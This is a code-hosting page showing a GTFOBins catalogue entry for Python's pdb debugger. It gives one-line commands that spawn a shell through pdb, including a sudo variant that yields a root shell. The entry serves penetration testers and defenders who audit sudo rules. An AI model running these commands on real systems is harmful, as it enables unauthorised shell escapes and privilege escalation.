This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
41124f24c2cd68aca27c71b12f683cc55dbda89a
GTFOBins.github.io
/
_gtfobins
/
pdb.md
bcoles
41124f24c2
Create pdb.md
2020-03-15 12:35:00 +01:00
289 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo 'import os; os.system("/bin/sh")' > $TF/x pdb $TF/x cont
code
TF=$(mktemp -d) echo 'import os; os.system("/bin/sh")' > $TF/x sudo pdb $TF/x cont
Reference in New Issue
View Git Blame
Copy Permalink